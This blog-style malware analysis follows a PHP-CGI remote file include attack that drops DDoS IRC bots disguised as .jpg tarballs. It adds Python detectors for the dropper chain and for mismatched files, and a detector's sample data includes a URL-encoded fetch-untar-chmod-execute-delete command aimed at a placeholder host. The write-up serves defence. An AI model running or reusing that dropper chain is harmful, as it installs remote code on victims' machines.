This post was contributed by my good friend and all around good guy, @hkmalwares.
In the last couple of weeks I saw some interesting PHP CGI remote file include attempts that carried a few DDoS IRC bots. I know these attempts are quite common in the wild, but this one stood out because it downloaded two different IRC bots. In this post I'm going to share what I found interesting about the encounter and do a basic breakdown.
The IDS rule that brought this to my attention was SERVER-WEBAPP PHP-CGI Remote file include attempt, SID 22063.
Basically, the payload changes directory to /tmp, wgets seed.jpg, untars it, grants execute permission on seed.jpg, runs it, and then deletes itself.
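As an added illustration (my own example, not code from the original post or from the capture), here is a small Python heuristic that looks for that same chain, change into a writable temp directory, fetch, untar, chmod +x, run, delete, in decoded request payloads or IDS alert bodies. The sample payloads, the example.invalid host and the stage names are all constructed for the example.

```python
"""Heuristic detector for download-and-execute dropper chains in captured
request payloads (for example the body of an IDS alert like the one above).
Added example; not code from the original post."""
import re
from urllib.parse import unquote_plus

# One regex per stage of the chain described in the post. Stage names are
# ours; the behaviour they look for is the one the post describes.
STAGES = {
    "cd_writable_dir": re.compile(r"\bcd\s+(/tmp|/var/tmp|/dev/shm)\b"),
    "download":        re.compile(r"\b(wget|curl|fetch)\s+\S+"),
    "extract":         re.compile(r"\btar\s+-?[a-zA-Z]*x[a-zA-Z]*\b"),
    "chmod_exec":      re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\b"),
    "run_local":       re.compile(r"(^|[;&|\s])\./\S+"),
    "self_delete":     re.compile(r"\brm\s+(-\w+\s+)*\S+"),
}

# Something fetched under an image extension and then executed locally is a
# strong sign of a disguised archive or binary.
IMAGE_EXT = re.compile(r"\.(jpe?g|png|gif)\b", re.IGNORECASE)


def classify_payload(raw):
    """Decode one payload and report which dropper stages it contains."""
    payload = unquote_plus(raw)
    stages = {name for name, rx in STAGES.items() if rx.search(payload)}
    disguised = "run_local" in stages and bool(IMAGE_EXT.search(payload))
    # Download followed by local execution is enough on its own; otherwise
    # require most of the chain so that a lone 'rm' or 'cd' is not flagged.
    suspicious = ({"download", "run_local"} <= stages) or len(stages) >= 4
    return {"stages": stages, "disguised_image": disguised, "suspicious": suspicious}


def scan_payloads(payloads):
    """Return the indices of payloads that look like dropper chains."""
    return [i for i, p in enumerate(payloads) if classify_payload(p)["suspicious"]]


# Constructed sample payloads, URL-encoded as a web server or IDS might log
# them. The first mirrors the chain the post describes, using a reserved
# example host; the second is a benign form submission.
SAMPLE_PAYLOADS = [
    "cd+/tmp%3Bwget+http%3A%2F%2Fexample.invalid%2Fseed.jpg%3Btar+xzf+seed.jpg"
    "%3Bchmod+%2Bx+seed.jpg%3B.%2Fseed.jpg%3Brm+-rf+seed.jpg",
    "name=alice&comment=hello+world",
]

if __name__ == "__main__":
    for i in scan_payloads(SAMPLE_PAYLOADS):
        result = classify_payload(SAMPLE_PAYLOADS[i])
        print(i, sorted(result["stages"]), "disguised image:", result["disguised_image"])
```

The scoring is deliberately conservative: a single `rm` or `cd /tmp` in a form post is not interesting, but a download immediately followed by execution of a local file, especially one named like an image, almost never is legitimate traffic.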
Let's go ahead and simply cat seed.jpg.
The tar contains a bash script that pulls down two payloads. First, let's dig into ddosperl.jpg. When untarred it spits out libssl3.so.2 into /var/temp. So what is libssl3.so.2? DDOS Perl IRC bot v1.0. A quick Google search revealed a [pastebin] containing the Perl script.
The next payload is a little bit more interesting. Going back to the second payload defined in seeds.jpg, we see another wget for flbotbsd.jpg. Again it's a tar, and it extracts a hidden directory ".d", then removes flbotbsd.jpg and executes ./autorun.
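To turn the artifacts above into something checkable on a host, here is an added Python example (not part of the original post) that scans a directory for files whose contents disagree with their image extension, hidden directories, and executable scripts. It builds its own constructed sample in a temporary directory (a real JPEG header, a plain tar saved as seed.jpg holding a placeholder script, and a hidden .d directory with an executable autorun placeholder); none of these files are the ones from the capture.

```python
"""Host-side check for the artifacts described above: archives or binaries
parked under an image extension, hidden directories, and executable scripts.
Added example; not code from the original post."""
import io
import os
import stat
import tarfile
import tempfile

IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")


def sniff(path):
    """Classify a file by its leading bytes, ignoring the extension entirely."""
    with open(path, "rb") as fh:
        head = fh.read(262)          # enough to reach the tar magic at offset 257
    if head.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if head.startswith(b"\x7fELF"):
        return "elf"
    if head.startswith(b"#!"):
        return "script"
    if head.startswith(b"\x1f\x8b") or head[257:262] == b"ustar":
        return "archive"             # gzip stream or plain ustar/GNU tar
    return "other"


def scan_dir(root):
    """Walk root and return (relative path, reason) pairs worth a closer look."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if d.startswith("."):
                rel = os.path.relpath(os.path.join(dirpath, d), root)
                findings.append((rel, "hidden directory"))
        for f in filenames:
            full = os.path.join(dirpath, f)
            rel = os.path.relpath(full, root)
            kind = sniff(full)
            ext = os.path.splitext(f)[1].lower()
            if ext in IMAGE_EXTS and kind in ("archive", "elf", "script"):
                findings.append((rel, f"{kind} content with image extension"))
            if kind in ("elf", "script") and os.stat(full).st_mode & stat.S_IXUSR:
                findings.append((rel, f"executable {kind}"))
    return sorted(findings)


def build_sample(root):
    """Create constructed files shaped like the artifacts the post describes."""
    # A genuine JPEG header: must not be flagged.
    with open(os.path.join(root, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0" + b"\x00" * 16)
    # A plain tar archive carrying a harmless placeholder shell script,
    # saved under an image name the way seed.jpg was.
    script = b"#!/bin/sh\necho placeholder stage\n"
    with tarfile.open(os.path.join(root, "seed.jpg"), "w") as tar:
        info = tarfile.TarInfo("stage.sh")
        info.size = len(script)
        tar.addfile(info, io.BytesIO(script))
    # A hidden directory holding an executable autorun placeholder, like ".d".
    hidden = os.path.join(root, ".d")
    os.mkdir(hidden)
    autorun = os.path.join(hidden, "autorun")
    with open(autorun, "wb") as fh:
        fh.write(b"#!/bin/sh\necho placeholder\n")
    os.chmod(autorun, 0o755)


def demo():
    """Build the sample in a throwaway directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        return scan_dir(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Pointing `scan_dir` at /tmp, /var/tmp or the /var/temp directory this sample used would surface the same three things an analyst looked for by hand here: an "image" that is really an archive, a dot-directory that should not be there, and a script with the execute bit set.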
After a quick Google search I came across others who have encountered this bot before. Caffsec is calling it FlooderIRCBot.
A [pastebin] posted back in April contains a description of most of the files seen within ".d". It looks like this bot contains a variety of flooder options.
However, in my sample I see some tools missing and some that have been added, such as ZmEu v0.2, XHide – Process Faker and ZAP. As for AV detections, a lot of these hack tools have been around for a while, so the detection ratios were quite high.
I think this is a good place to stop, as this post is getting too long and was only meant to be a basic dive.